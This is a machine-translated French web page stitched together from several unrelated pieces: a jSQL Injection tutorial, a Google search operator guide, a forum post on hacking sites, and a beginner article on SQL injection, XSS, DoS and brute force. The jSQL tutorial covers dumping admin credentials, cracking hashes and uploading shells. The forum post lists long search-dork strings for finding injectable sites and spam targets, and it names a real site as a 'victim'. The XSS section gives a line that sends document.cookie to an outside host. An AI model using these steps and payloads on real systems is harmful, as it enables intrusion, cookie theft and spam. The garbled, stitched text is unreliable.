Instructions pour utiliser jSQL Injection, un outil multifonctionnel pour trouver et exploiter des injections SQL dans Kali Linux. Instructions d'utilisation de jSQL Injection - un outil multifonctionnel pour trouver et exploiter des injections SQL dans Kali Linux

domicile / raccroche

Exécutez le fichier téléchargé en double-cliquant (vous devez avoir machine virtuelle ).

3. Anonymat lors de la vérification du site pour les injections SQL

Configurer Tor et Privoxy dans Kali Linux

[Rubrique en développement]

Configurer Tor et Privoxy sous Windows

[Rubrique en développement]

Paramètres proxy d'injection jSQL

[Rubrique en développement]

4. Vérification du site pour l'injection SQL avec jSQL Injection

Travailler avec le programme est extrêmement simple. Entrez simplement l'adresse du site et appuyez sur ENTER.

La capture d'écran suivante montre que le site est vulnérable à trois types d'injections SQL à la fois (les informations les concernant sont indiquées dans le coin inférieur droit). En cliquant sur les noms des injections, vous pouvez changer la méthode utilisée :

De plus, nous avons déjà affiché les bases de données existantes.

Vous pouvez voir le contenu de chaque table :

Habituellement, la partie la plus intéressante des tableaux est les informations d'identification de l'administrateur.

Si vous avez de la chance et que vous avez trouvé les données de l'administrateur, il est trop tôt pour se réjouir. Vous devez également trouver le panneau d'administration, où saisir ces données.

5. Rechercher des administrateurs avec jSQL Injection

Pour ce faire, passez à l'onglet suivant. Ici, nous sommes accueillis par une liste d'adresses possibles. Vous pouvez sélectionner une ou plusieurs pages à vérifier :

La commodité est que vous n'avez pas besoin d'utiliser d'autres programmes.

Malheureusement, il n'y a pas beaucoup de programmeurs négligents qui stockent les mots de passe en texte clair. Très souvent, dans la chaîne de mot de passe, nous voyons quelque chose comme

8743b52063cd84097a65d1633f5c74f5

Ceci est un hachage. Vous pouvez le décrypter avec la force brute. Et… jSQL Injection a un forceur brut intégré.

6. Brute-forcer les hachages avec l'injection jSQL

La commodité incontestable est que vous n'avez pas besoin de rechercher d'autres programmes. Il existe un support pour la plupart des hachages les plus populaires.

Ce n'est pas le meilleur Meilleure option. Afin de devenir un gourou du déchiffrement des hachages, le livre "" en russe est recommandé.

Mais, bien sûr, lorsqu'il n'y a pas d'autre programme à portée de main ou que vous n'avez pas le temps d'apprendre, jSQL Injection avec une fonction de force brute intégrée sera utile.

Il existe des paramètres : vous pouvez définir les caractères inclus dans le mot de passe, la plage de longueur du mot de passe.

7. Opérations sur les fichiers après la détection d'une injection SQL

En plus des opérations avec les bases de données - les lire et les modifier, si des injections SQL sont détectées, les opérations suivantes sur les fichiers peuvent être effectuées :

  • lire des fichiers sur le serveur
  • chargement de nouveaux fichiers sur le serveur
  • télécharger des shells sur le serveur

Et tout cela est implémenté dans jSQL Injection !

Il existe des limitations - le serveur SQL doit avoir des privilèges de fichier. Raisonnable administrateurs système ils sont handicapés et l'accès à système de fichiers ne peut être obtenu.

La présence de privilèges de fichiers est assez facile à vérifier. Accédez à l'un des onglets (lecture de fichiers, création d'un shell, téléchargement d'un nouveau fichier) et essayez d'effectuer l'une des opérations indiquées.

Toujours très note importante- nous devons connaître le chemin absolu exact vers le fichier avec lequel nous allons travailler - sinon rien ne fonctionnera.

Regardez la capture d'écran suivante :

Toute tentative d'intervention sur un fichier est répondue par : Pas de privilège FILE(pas de privilèges de fichier). Et rien ne peut être fait ici.

Si à la place vous avez une autre erreur :

Problème d'écriture dans [nom_répertoire]

Cela signifie que vous avez mal spécifié le chemin absolu où vous voulez écrire le fichier.

Pour supposer un chemin absolu, il faut au moins savoir système opérateur sur lequel tourne le serveur. Pour ce faire, passez à l'onglet Réseau.

Une telle entrée (chaîne Win64) nous donne des raisons de supposer que nous avons affaire à un système d'exploitation Windows :

Keep-Alive : timeout=5, max=99 Serveur : Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connexion : Keep-Alive Méthode : HTTP/1.1 200 OK Longueur du contenu : 353 Date : ven. 11 déc. 2015 11:48:31 GMT X-Powered-By : PHP/7.0.0RC6 Type de contenu : text/html ; jeu de caractères=UTF-8

Ici, nous avons quelques Unix (*BSD, Linux):

Transfer-Encoding : chunked Date : Fri, 11 Dec 2015 11:57:02 GMT Method : HTTP/1.1 200 OK Keep-Alive : timeout=3, max=100 Connection : keep-alive Content-Type : text/html X- Propulsé par : PHP/5.3.29 Serveur : Apache/2.2.31 (Unix)

Et ici, nous avons CentOS :

Méthode : HTTP/1.1 200 OK Expire : jeu. 19 novembre 1981 08:52:00 GMT Set-Cookie : PHPSESSID=9p60gtunrv7g41iurr814h9rd0 ; path=/ Connexion : keep-alive X-Cache-Lookup : MISS de t1.hoster.ru:6666 Serveur : Apache/2.2.15 (CentOS) X-Powered-By : PHP/5.4.37 X-Cache : MISS de t1.hoster.ru Cache-Control : no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma : no-cache Date : vendredi 11 décembre 2015 12:08:54 GMT Transfer-Encoding : chunked Content-Type : text/html ; jeu de caractères=WINDOWS-1251

Sous Windows, un dossier de site typique est C:\Server\data\htdocs\. Mais, en fait, si quelqu'un "pensait" à créer un serveur sous Windows, alors, très probablement, cette personne n'a rien entendu sur les privilèges. Par conséquent, vous devriez commencer à essayer directement depuis le répertoire C:/Windows/ :

Comme vous pouvez le voir, tout s'est parfaitement déroulé la première fois.

Mais les shells d'injection jSQL eux-mêmes soulèvent mes doutes. Si vous avez des privilèges de fichier, vous pouvez très bien télécharger quelque chose avec une interface Web.

8. Sites de vérification en masse pour les injections SQL

Et même jSQL Injection a cette fonctionnalité. Tout est extrêmement simple - téléchargez une liste de sites (peut être importée à partir d'un fichier), sélectionnez ceux que vous souhaitez vérifier et cliquez sur le bouton approprié pour lancer l'opération.

Sortie par jSQL Injection

L'injection jSQL est bonne, outil puissant pour la recherche et l'utilisation ultérieure des injections SQL trouvées sur les sites. Ses atouts indéniables : facilité d'utilisation, intégration fonctionnalités associées. jSQL Injection peut être le meilleur ami du débutant lors de l'analyse de sites Web.

Parmi les lacunes, je noterais l'impossibilité d'éditer des bases de données (du moins je n'ai pas trouvé cette fonctionnalité). Comme tous les instruments avec interface graphique, les inconvénients de ce programme peuvent être attribués à l'impossibilité de l'utiliser dans les scripts. Néanmoins, une certaine automatisation est également possible dans ce programme - grâce à la fonction intégrée de vérification de site en masse.

jSQL Injection est beaucoup plus pratique à utiliser que sqlmap . Mais sqlmap prend en charge plus de types d'injection SQL, dispose d'options de pare-feu de fichiers et d'autres fonctionnalités.

Conclusion : Injection jSQL - meilleur ami pirate informatique novice.

Aide pour ce programme dans l'Encyclopédie Kali Linux vous trouverez sur cette page : http://kali.tools/?p=706

Comment effectuer une recherche avec google.com

Tout le monde sait probablement comment l'utiliser moteur de recherche comme Google =) Mais tout le monde ne sait pas que si vous composez correctement requête de rechercheà l'aide de conceptions spéciales, vous pouvez obtenir les résultats de ce que vous recherchez beaucoup plus efficacement et rapidement =) Dans cet article, je vais essayer de montrer quoi et comment vous devez faire pour rechercher correctement

Google prend en charge plusieurs opérateurs de recherche avancée qui ont une signification particulière lors de la recherche sur google.com. Généralement, ces opérateurs modifient la recherche, voire demandent à Google de tout faire. différents types chercher. Par exemple, la conception lien: est un opérateur spécial, et la requête lien : www.google.com ne vous donnera pas une recherche normale, mais trouvera à la place toutes les pages Web qui ont des liens vers google.com.
types de demande alternatifs

cache : Si vous incluez d'autres mots dans la requête, Google mettra en surbrillance ces mots inclus dans le document mis en cache.
Par exemple, cache:site www.web affichera le contenu mis en cache avec le mot "web" en surbrillance.

lien: la requête de recherche ci-dessus affichera les pages Web contenant des liens vers la requête spécifiée.
Par exemple: lien : www.site Web affichera toutes les pages qui ont un lien vers http://www.site

en relation: Affiche les pages Web "associées" à la page Web spécifiée.
Par exemple, connexe : www.google.com listera les pages Web qui sont similaires page d'accueil Google.

Info: Demander des informations : fournira certaines informations dont dispose Google sur la page Web demandée.
Par exemple, infos:site internet affichera des informations sur notre forum =) (Armada - Forum des webmasters adultes).

Autres demandes d'informations

définir: La requête define: fournira une définition des mots que vous tapez après cela, compilée à partir de diverses sources en ligne. La définition s'appliquera à l'intégralité de la phrase saisie (c'est-à-dire qu'elle inclura tous les mots de la requête exacte).

actions : Si vous démarrez une requête avec des actions : Google traitera le reste des termes de la requête comme des symboles boursiers et établira un lien vers une page affichant les informations préparées pour ces symboles.
Par exemple, stocks: intel yahoo affichera des informations sur Intel et Yahoo. (Notez que vous devez imprimer les caractères des dernières nouvelles, pas le nom de l'entreprise)

Demander des modificateurs

placer: Si vous incluez site : dans votre requête, Google limitera les résultats aux sites Web qu'il trouve dans ce domaine.
Vous pouvez également rechercher des zones individuelles, telles que ru, org, com, etc. ( site:com site:ru)

allintitle : Si vous exécutez une requête avec allintitle:, Google limitera les résultats avec tous les mots de la requête dans le titre.
Par exemple, allintitle : recherche google renverra toutes les pages de recherche Google telles que les images, le blog, etc.

Titre: Si vous incluez intitle: dans votre requête, Google limitera les résultats aux documents contenant ce mot dans le titre.
Par exemple, titre :Entreprise

allinurl : Si vous exécutez une requête avec allinurl : Google limitera les résultats avec tous les mots de la requête dans l'URL.
Par exemple, allinurl : recherche google retournera les documents avec google et recherchera dans le titre. Aussi, en option, vous pouvez séparer les mots par une barre oblique (/) puis les mots des deux côtés de la barre oblique seront recherchés dans la même page : Exemple allinurl : foo/bar

inurl : Si vous incluez inurl : dans votre requête, Google limitera les résultats aux documents contenant ce mot dans l'URL.
Par exemple, URL de l'animation : site Web

intext: recherche uniquement dans le texte de la page le mot spécifié, en ignorant le titre et les textes des liens, et d'autres éléments sans rapport avec. Il existe également un dérivé de ce modificateur - allintext : ceux. de plus, tous les mots de la requête seront recherchés uniquement dans le texte, ce qui est également important, en ignorant les mots fréquemment utilisés dans les liens
Par exemple, intext:forum

plage de dates : recherche dans des périodes (plage de dates : 2452389-2452389), les dates pour l'heure sont spécifiées au format julien.

Eh bien, et toutes sortes d'exemples intéressants de demandes

Exemples de compilation de requêtes pour Google. Pour les spammeurs

inurl:control.guest?a=signe

Site:books.dreambook.com "URL de la page d'accueil" "Sign my" inurl:sign

Site : www.freegb.net Page d'accueil

Inurl:sign.asp "Nombre de caractères"

"Message :" inurl:sign.cfm "Expéditeur :"

inurl:register.php "Enregistrement de l'utilisateur" "Site Web"

Inurl:edu/guestbook "Signer le livre d'or"

Inurl:post "Publier un commentaire" "URL"

Inurl :/archives/ "Commentaires :" "Mémoriser l'info ?"

"Script et livre d'or créé par :" "URL :" "Commentaires :"

inurl:?action=add "phpBook" "URL"

Intitle: "Soumettre une nouvelle histoire"

Les magazines

inurl:www.livejournal.com/users/mode=reply

inurl mostjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

inurl:fastbb.ru /re.pl? "Livre d'or"

Blogues

Inurl:blogger.com/comment.g?"postID""anonyme"

Inurl:typepad.com/ "Poster un commentaire" "Mémoriser mes infos personnelles ?"

Inurl:greatestjournal.com/community/ "Post comment" "adresses d'affiches anonymes"

"Poster un commentaire" "adresses d'affiches anonymes" -

Intitle:"Publier un commentaire"

Inurl:pirillo.com “Publier un commentaire”

Forums

Inurl:gate.html?"name=Forums" "mode=reply"

inurl :"forum/posting.php?mode=reply"

inurl:"mes.php?"

inurl : "membres.html"

inurl:forum/memberlist.php ?"

Et donc, maintenant, je vais parler de la façon de pirater quelque chose sans connaissance particulière de quoi que ce soit. Je dis tout de suite, il y a peu d'avantages à cela, mais quand même.
Tout d'abord, vous devez trouver les sites eux-mêmes. Pour ce faire, rendez-vous sur google.com et recherchez dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl : news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl : select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= je nurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl : prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= dans url:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2. php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql. php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4? id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl : regarde.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl : offre.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl :".php?num=1" inurl :".php?bid=1" inurl :".php?pid=1" inurl :".php?nid=1"

voici un petit extrait. Vous pouvez utiliser le vôtre. Et donc, nous avons trouvé le site. Par exemple http://www.vestitambov.ru/
Ensuite, téléchargez ce programme

**Contenu masqué : pour voir ce contenu masqué, votre nombre de publications doit être supérieur ou égal à 3.**

Cliquez sur OK. Ensuite, nous insérons le site de la victime.
Nous appuyons sur start. Ensuite, nous attendons les résultats.
Et ainsi, le programme a trouvé une vulnérabilité SQL.

Ensuite, téléchargez Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= collez le lien résultant ici. Je n'expliquerai pas comment utiliser Havij et où le télécharger, il n'est pas difficile de le trouver. Tout. Vous avez reçu les données dont vous avez besoin - le mot de passe administrateur, puis c'est à votre imagination.

PS C'est ma première tentative d'écrire quelque chose. Je suis désolé si c'est faux

j'ai décidé d'en parler un peu la sécurité des informations. L'article sera utile aux programmeurs novices et à ceux qui viennent de commencer le développement Frontend. Quel est le problème?

De nombreux développeurs novices sont tellement accros à l'écriture de code qu'ils oublient complètement la sécurité de leur travail. Et surtout, ils oublient des vulnérabilités telles que la requête SQL, XXS. Ils proposent également des mots de passe faciles pour leurs panneaux d'administration et sont soumis à la force brute. Quelles sont ces attaques et comment les éviter ?

Injection SQL

L'injection SQL est le type d'attaque de base de données le plus courant effectué avec une requête SQL pour un SGBD spécifique. De nombreuses personnes et même de grandes entreprises souffrent de telles attaques. La raison en est une erreur du développeur lors de l'écriture d'une base de données et, en fait, des requêtes SQL.

Une attaque de type injection SQL est possible en raison d'un traitement incorrect des données d'entrée utilisées dans les requêtes SQL. En cas d'attaque réussie par un pirate informatique, vous courez le risque de perdre non seulement le contenu des bases de données, mais également les mots de passe et les journaux du panneau d'administration, respectivement. Et ces données seront bien suffisantes pour reprendre complètement le site ou y apporter des ajustements irréversibles.

L'attaque peut être reproduite avec succès dans des scripts écrits en PHP, ASP, Perl et d'autres langages. Le succès de telles attaques dépend davantage du SGBD utilisé et de la manière dont le scénario lui-même est mis en œuvre. Il existe de nombreux sites vulnérables aux injections SQL dans le monde. Ceci est facile à vérifier. Il suffit d'entrer "dorks" - ce sont des demandes spéciales pour trouver des sites vulnérables. En voici quelques-uns :

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:idpage=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Comment les utiliser ? Il suffit de les saisir dans le moteur de recherche Google ou Yandex. Le moteur de recherche vous donnera non seulement un site vulnérable, mais aussi une page pour cette vulnérabilité. Mais nous ne nous arrêterons pas là et nous nous assurerons que la page est vraiment vulnérable. Pour cela, il suffit de mettre après la valeur "id=1" simple citation"'". Quelque chose comme ça:

  • inurl:games.php?id=1'

Et le site nous donnera une erreur sur Requête SQL. De quoi notre hacker a-t-il besoin ensuite ?

Et puis il a besoin de ce lien même vers la page avec une erreur. Ensuite, le travail sur la vulnérabilité se déroule dans la plupart des cas dans le kit de distribution "Kali linux" avec ses utilitaires pour cette partie : l'introduction du code d'injection et la réalisation des opérations nécessaires. Comment cela va se passer, je ne peux pas vous le dire. Mais vous pouvez trouver des informations à ce sujet sur Internet.

Attaque XSS

Ce type d'attaque est mené sur Biscuits. À leur tour, ils aiment beaucoup sauver les utilisateurs. Pourquoi pas? Comment sans eux ? Après tout, grâce aux cookies, nous ne créons pas cent fois un mot de passe de Vk.com ou Mail.ru. Et rares sont ceux qui les refusent. Mais sur Internet, une règle apparaît souvent pour les hackers : le coefficient de commodité est directement proportionnel au coefficient d'insécurité.

Pour implémenter une attaque XSS, notre hacker a besoin de connaissances en JavaScript. Le langage à première vue est très simple et inoffensif, car il n'a pas accès aux ressources informatiques. Un pirate ne peut travailler avec JavaScript que dans un navigateur, mais cela suffit. Après tout, l'essentiel est d'entrer le code dans la page Web.

Je n'entrerai pas dans les détails du processus d'attaque. Je ne dirai que les bases et la signification de la façon dont cela se produit.

Un pirate peut ajouter du code JS à un forum ou à un livre d'or :

Les scripts nous redirigent vers une page infectée où le code sera exécuté : qu'il s'agisse d'un renifleur, d'une sorte de stockage ou d'un exploit qui volera d'une manière ou d'une autre nos cookies dans le cache.

Pourquoi Javascript ? Parce que JavaScript est génial avec les requêtes Web et a accès aux cookies. Mais si notre script nous transfère sur un site, l'utilisateur le remarquera facilement. Ici, le pirate utilise une option plus rusée - il entre simplement le code dans l'image.

Img=nouvelleImage();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

Nous créons simplement une image et lui attribuons notre script comme adresse.

Comment se protéger de tout cela ? Très simple - ne suivez pas les liens suspects.

Attaques DoS et DDos


DoS (de l'anglais Denial of Service - déni de service) attaque de pirate sur le système informatique afin de le faire tomber. Il s'agit de la création de telles conditions dans lesquelles les utilisateurs consciencieux du système ne peuvent pas accéder aux ressources système(serveurs), ou cet accès est difficile. Une défaillance du système peut également être une étape vers sa capture si, en cas d'urgence, le logiciel fournit des informations critiques : par exemple, version, pièce code de programme etc. Mais il s'agit le plus souvent d'une mesure de pression économique : la perte d'un simple service générateur de revenus. Les factures du fournisseur ou les mesures visant à éviter l'attaque atteignent de manière significative la "cible" dans la poche.Actuellement, les attaques DoS et DDoS sont les plus populaires, car elles vous permettent de faire échouer presque n'importe quel système sans laisser de preuves juridiquement significatives.

Quelle est la différence entre les attaques DoS et DDos ?

DoS est une attaque construite de manière intelligente. Par exemple, si le serveur ne vérifie pas l'exactitude des paquets entrants, un pirate peut faire une telle demande qui sera traitée pour toujours, et il n'y aura pas assez de temps processeur pour travailler avec d'autres connexions. En conséquence, les clients recevront un déni de service. Mais cela ne fonctionnera pas pour surcharger ou désactiver les grands sites bien connus de cette manière. Ils sont armés de canaux assez larges et de serveurs surpuissants qui peuvent facilement faire face à une telle surcharge.

DDoS est en fait la même attaque que DoS. Mais si dans DoS il y a un paquet de requêtes, alors dans DDoS il peut très bien y en avoir des centaines ou plus. Même les serveurs lourds peuvent ne pas être en mesure de faire face à une telle surcharge. Je vais vous donner un exemple.

Une attaque DoS, c'est quand vous avez une conversation avec quelqu'un, mais qu'une personne mal élevée arrive et commence à crier fort. Parler est soit impossible, soit très difficile. Solution : appelez la sécurité, qui calmera et sortira la personne de la pièce. Les attaques DDoS se produisent lorsque des milliers de ces personnes mal élevées se présentent. Dans ce cas, les gardes ne pourront pas se tordre et emmener tout le monde.

DoS et DDoS sont produits à partir d'ordinateurs, les soi-disant zombies. Ce sont des ordinateurs d'utilisateurs piratés par des pirates qui ne soupçonnent même pas que leur machine est impliquée dans l'attaque d'un serveur.

Comment s'en protéger ? En général, pas moyen. Mais vous pouvez compliquer la tâche d'un pirate informatique. Pour ce faire, vous devez sélectionner bon hébergement avec des serveurs puissants.

Attaque de force brute

Un développeur peut proposer de nombreux systèmes de protection contre les attaques, revoir entièrement les scripts que nous avons écrits, vérifier les vulnérabilités du site, etc. Mais quand il s'agit de dernière étape mise en page du site, à savoir quand il sera facile de mettre un mot de passe sur le panneau d'administration, il peut oublier une chose. Mot de passe!

Il est fortement déconseillé de définir un mot de passe simple. Il peut s'agir de 12345, 1114457, vasya111, etc. Il n'est pas recommandé de définir des mots de passe de moins de 10-11 caractères. Sinon, vous pourriez être soumis à l'attaque la plus courante et la moins complexe - la force brute.

La force brute est une attaque par force brute de mot de passe basée sur un dictionnaire utilisant programmes spéciaux. Les dictionnaires peuvent être différents : latin, tri par nombres, disons jusqu'à une certaine plage, mixte (latin + nombres), et il existe même des dictionnaires avec des symboles uniques @#4$%&*~~`'"\ ? etc.

Bien sûr, ce type d'attaque est facile à éviter, il suffit de trouver un mot de passe complexe. Même le captcha peut vous sauver. Et aussi, si votre site est fait sur CMS, alors beaucoup d'entre eux calculent un type d'attaque similaire et bloquent l'ip. Nous devons toujours nous rappeler que plus il y a de caractères différents dans le mot de passe, plus il est difficile de le saisir.

Comment fonctionnent les pirates ? Dans la plupart des cas, ils suspectent ou connaissent déjà une partie du mot de passe. Il est tout à fait logique de supposer que le mot de passe de l'utilisateur ne sera certainement pas composé de 3 ou 5 caractères. Ces mots de passe conduisent à des piratages fréquents. Fondamentalement, les pirates prennent une plage de 5 à 10 caractères et y ajoutent quelques caractères qu'ils connaissent probablement à l'avance. Ensuite, générez des mots de passe avec les plages souhaitées. La distribution Kali Linux a même des programmes pour de tels cas. Et voilà, l'attaque ne durera plus longtemps, puisque le volume du dictionnaire n'est plus aussi important. De plus, un pirate peut utiliser la puissance de la carte vidéo. Certains d'entre eux prennent en charge le système CUDA, tandis que la vitesse d'énumération augmente jusqu'à 10 fois. Et maintenant nous voyons que l'attaque est d'une manière simple bien réel. Mais les sites ne sont pas les seuls à être soumis à la force brute.

Chers développeurs, n'oubliez jamais le système de sécurité de l'information, car aujourd'hui de nombreuses personnes, y compris des États, souffrent de ce type d'attaques. Après tout, la plus grande vulnérabilité est une personne qui peut toujours être distraite quelque part ou négliger quelque part. Nous sommes des programmeurs, mais pas des machines programmées. Soyez toujours en alerte, car la perte d'informations menace de graves conséquences !

© 2022 ermake.ru -- À propos de la réparation de PC - Portail d'information